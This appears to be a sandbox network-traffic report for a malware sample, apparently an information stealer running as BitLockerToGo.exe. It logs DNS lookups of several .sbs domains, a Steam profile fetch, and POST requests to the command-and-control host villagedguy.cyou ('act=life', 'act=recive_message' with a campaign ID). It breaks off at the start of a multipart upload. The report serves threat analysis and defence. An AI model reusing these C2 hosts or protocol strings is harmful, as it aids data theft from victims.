                                                                                                                                                                        Oct 31, 2024 01:05:28.150762081 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.151283979 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.151297092 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.760766029 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.760828972 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.761895895 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.761904955 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.762182951 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.763256073 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763370991 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763406038 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:28.763477087 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:28.763484955 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894750118 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894866943 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:30.894937992 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:30.895054102 CET49741443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:30.895076036 CET44349741104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.229635000 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.229739904 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.229836941 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.230123997 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.230161905 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.839014053 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.839112997 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.840233088 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.840281963 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.840527058 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:31.841691971 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.841804028 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:31.841841936 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311294079 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311392069 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.311463118 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.312036991 CET49742443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.312082052 CET44349742104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.646065950 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646115065 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:32.646198988 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646533012 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:32.646545887 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.256228924 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.256303072 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.257484913 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.257496119 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.257735968 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.258882999 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.258979082 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.259001970 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735585928 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735683918 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.735743046 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.738683939 CET49743443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.738704920 CET44349743104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.898740053 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.898780107 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:33.898865938 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.899183989 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:33.899197102 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.504427910 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.504538059 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.505803108 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.505814075 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.506042004 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.508285999 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.508367062 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.508372068 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982683897 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982820988 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:34.982882977 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.982975960 CET49744443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:34.982990980 CET44349744104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.106194973 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106247902 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.106347084 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106642962 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.106656075 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.710856915 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.711061001 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.712194920 CET49745443192.168.2.4104.21.32.196
                                                                                                                                                                        Oct 31, 2024 01:05:35.712204933 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.712408066 CET44349745104.21.32.196192.168.2.4
                                                                                                                                                                        Oct 31, 2024 01:05:35.731758118 CET49745443192.168.2.4104.21.32.196
Oct 31, 2024 01:05:35.731837034 CET | 49745 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:35.731843948 CET | 443 | 49745 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.039542913 CET | 443 | 49745 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.039673090 CET | 443 | 49745 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.039741039 CET | 49745 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:36.039834976 CET | 49745 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:36.039859056 CET | 443 | 49745 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.091118097 CET | 49746 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:36.091171026 CET | 443 | 49746 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.091238022 CET | 49746 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:36.091686010 CET | 49746 | 443 | 192.168.2.4 | 104.21.32.196
Oct 31, 2024 01:05:36.091706038 CET | 443 | 49746 | 104.21.32.196 | 192.168.2.4
Oct 31, 2024 01:05:36.610814095 CET | 49746 | 443 | 192.168.2.4 | 104.21.32.196
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 31, 2024 01:05:20.635488033 CET | 63735 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.644352913 CET | 53 | 63735 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.647197008 CET | 59066 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.657962084 CET | 53 | 59066 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.659161091 CET | 52412 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.668311119 CET | 53 | 52412 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.670625925 CET | 62213 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.679044008 CET | 53 | 62213 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.681200027 CET | 58904 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.689716101 CET | 53 | 58904 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.691870928 CET | 57319 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.700426102 CET | 53 | 57319 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.704814911 CET | 60925 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.713851929 CET | 53 | 60925 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.715001106 CET | 49626 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.723653078 CET | 53 | 49626 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:20.725841999 CET | 59846 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:20.733666897 CET | 53 | 59846 | 1.1.1.1 | 192.168.2.4
Oct 31, 2024 01:05:22.543515921 CET | 62026 | 53 | 192.168.2.4 | 1.1.1.1
Oct 31, 2024 01:05:22.556458950 CET | 53 | 62026 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 31, 2024 01:05:20.635488033 CET | 192.168.2.4 | 1.1.1.1 | 0xc4cc | Standard query (0) | deepymouthi.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.647197008 CET | 192.168.2.4 | 1.1.1.1 | 0x555c | Standard query (0) | monstourtu.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.659161091 CET | 192.168.2.4 | 1.1.1.1 | 0x8f34 | Standard query (0) | heroicmint.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.670625925 CET | 192.168.2.4 | 1.1.1.1 | 0x8a01 | Standard query (0) | sidercotay.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.681200027 CET | 192.168.2.4 | 1.1.1.1 | 0xad99 | Standard query (0) | captaitwik.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.691870928 CET | 192.168.2.4 | 1.1.1.1 | 0x599d | Standard query (0) | wrigglesight.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.704814911 CET | 192.168.2.4 | 1.1.1.1 | 0x2dc8 | Standard query (0) | ferrycheatyk.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.715001106 CET | 192.168.2.4 | 1.1.1.1 | 0x769 | Standard query (0) | snailyeductyi.sbs | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.725841999 CET | 192.168.2.4 | 1.1.1.1 | 0x31e9 | Standard query (0) | steamcommunity.com | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:22.543515921 CET | 192.168.2.4 | 1.1.1.1 | 0xb433 | Standard query (0) | villagedguy.cyou | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 31, 2024 01:05:20.644352913 CET | 1.1.1.1 | 192.168.2.4 | 0xc4cc | Name error (3) | deepymouthi.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.657962084 CET | 1.1.1.1 | 192.168.2.4 | 0x555c | Name error (3) | monstourtu.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.668311119 CET | 1.1.1.1 | 192.168.2.4 | 0x8f34 | Name error (3) | heroicmint.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.679044008 CET | 1.1.1.1 | 192.168.2.4 | 0x8a01 | Name error (3) | sidercotay.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.689716101 CET | 1.1.1.1 | 192.168.2.4 | 0xad99 | Name error (3) | captaitwik.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.700426102 CET | 1.1.1.1 | 192.168.2.4 | 0x599d | Name error (3) | wrigglesight.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.713851929 CET | 1.1.1.1 | 192.168.2.4 | 0x2dc8 | Name error (3) | ferrycheatyk.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.723653078 CET | 1.1.1.1 | 192.168.2.4 | 0x769 | Name error (3) | snailyeductyi.sbs | none | none | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:20.733666897 CET | 1.1.1.1 | 192.168.2.4 | 0x31e9 | No error (0) | steamcommunity.com |  | 104.102.49.254 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:22.556458950 CET | 1.1.1.1 | 192.168.2.4 | 0xb433 | No error (0) | villagedguy.cyou |  | 104.21.32.196 | A (IP address) | IN (0x0001) | false
Oct 31, 2024 01:05:22.556458950 CET | 1.1.1.1 | 192.168.2.4 | 0xb433 | No error (0) | villagedguy.cyou |  | 172.67.154.113 | A (IP address) | IN (0x0001) | false
• steamcommunity.com
• villagedguy.cyou
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49734 | 104.102.49.254 | 443 | 2676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:21 UTC | 219 | OUT | GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-10-31 00:05:22 UTC | 1917 | IN | HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Thu, 31 Oct 2024 00:05:21 GMT
Content-Length: 35954
Connection: close
Set-Cookie: sessionid=447d09e58bc3481a7560f95d; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7Ccd7cb03e35e41f48f2bf1c7941cd6349; Path=/; Secure; HttpOnly; SameSite=None
2024-10-31 00:05:22 UTC | 14467 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-10-31 00:05:22 UTC | 16384 | IN | Data Raw: 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22
Data Ascii: a class="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="submenuitem"
2024-10-31 00:05:22 UTC | 3768 | IN | Data Raw: 61 72 20 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 73 69 7a 65 20 6f 66 66 6c 69 6e 65 22 20 64 61 74 61 2d 6d 69 6e 69 70 72 6f 66 69 6c 65 3d 22 31 37 36 34 30 36 36 31 37 32 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6c 61 79 65 72 41 76 61 74 61 72 41 75 74 6f 53 69 7a 65 49 6e 6e 65 72 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 61 76 61 74 61 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 2f 66 65 66 34 39 65 37 66 61 37 65 31 39 39 37 33 31 30 64 37 30 35 62 32 61 36 31 35 38 66 66 38 64 63 31 63 64 66 65 62 5f 66 75 6c 6c 2e 6a 70 67 22 3e 0d 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 3c 2f 64 69 76
Data Ascii: ar profile_header_size offline" data-miniprofile="1764066172"><div class="playerAvatarAutoSizeInner"><img src="https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg"></div></div
2024-10-31 00:05:22 UTC | 1335 | IN | Data Raw: 2e 63 6f 6d 2f 70 75 62 6c 69 63 2f 69 6d 61 67 65 73 2f 73 6b 69 6e 5f 31 2f 66 6f 6f 74 65 72 4c 6f 67 6f 5f 76 61 6c 76 65 2e 70 6e 67 3f 76 3d 31 22 20 77 69 64 74 68 3d 22 39 36 22 20 68 65 69 67 68 74 3d 22 32 36 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 56 61 6c 76 65 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 54 65 78 74 22 3e 0d 0a 09 09 09 09 09 26 63 6f 70 79 3b 20 56 61 6c 76 65 20 43 6f 72 70 6f 72 61 74 69 6f 6e 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 20 41 6c 6c 20 74 72 61 64 65 6d 61 72 6b 73 20 61 72 65 20 70 72 6f 70 65 72 74 79 20 6f 66 20 74 68 65 69 72 20 72 65 73 70 65 63 74 69 76 65 20 6f 77 6e 65 72 73 20 69 6e 20 74 68 65
Data Ascii: .com/public/images/skin_1/footerLogo_valve.png?v=1" width="96" height="26" border="0" alt="Valve Logo" /></span><span id="footerText">&copy; Valve Corporation. All rights reserved. All trademarks are property of their respective owners in the


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49736 | 104.21.32.196 | 443 | 2676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:23 UTC | 263 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: villagedguy.cyou
2024-10-31 00:05:23 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-31 00:05:23 UTC | 1005 | IN | HTTP/1.1 200 OK
Date: Thu, 31 Oct 2024 00:05:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=1foaruqrf9hujs0vrelprdukgp; expires=Sun, 23-Feb-2025 17:52:02 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cNEifAhWiQa0LJRGodP3iVGLynY1GH4UP1XAQ%2FA93dp4Bo0hplhU%2F1U9M84T0kDWu3lOef2LQlgb1eJHwOmDfBiWWIJJoNU84sCR2WJR4J83Y56Jkq0QGVIZNcPxtRLDZsrR"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8daf64a48f5a463e-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1988&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=907&delivery_rate=1455276&cwnd=249&unsent_bytes=0&cid=7d5ef95828c7bd96&ts=510&x=0"
2024-10-31 00:05:23 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-31 00:05:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49738 | 104.21.32.196 | 443 | 2676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:24 UTC | 264 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 75
    Host: villagedguy.cyou
2024-10-31 00:05:24 UTC | 75 | OUT | Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 74 4c 59 4d 65 35 2d 2d 33 26 6a 3d 35 63 39 62 38 36 37 34 61 36 33 30 64 39 31 30 31 62 34 36 37 33 33 61 61 33 37 66 31 35 65 63
    Data Ascii: act=recive_message&ver=4.0&lid=tLYMe5--3&j=5c9b8674a630d9101b46733aa37f15ec
2024-10-31 00:05:24 UTC | 1011 | IN | HTTP/1.1 200 OK
    Date: Thu, 31 Oct 2024 00:05:24 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=l2e632l2203gccr19c2732i0cg; expires=Sun, 23-Feb-2025 17:52:03 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lj5w6Fe31qNxMm5vClSVnolpPtwOw%2B9C82z%2FSdkJ8zYP9W4IS9KJ3YwtRY%2BEZzyX9xR4a65CesGPkEeCCDssS%2BjiJPKVQVMvrctBIOBCqZ%2Bp72leXb0cfiUPhOeP9JBc0Qho"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8daf64abd8dac872-DFW
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2223&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=975&delivery_rate=1280282&cwnd=252&unsent_bytes=0&cid=ebbc1ebcf84cd70d&ts=451&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49739 | 104.21.32.196 | 443 | 2676 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-31 00:05:25 UTC | 282 | OUT | POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=be85de5ipdocierre1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 18159
    Host: villagedguy.cyou
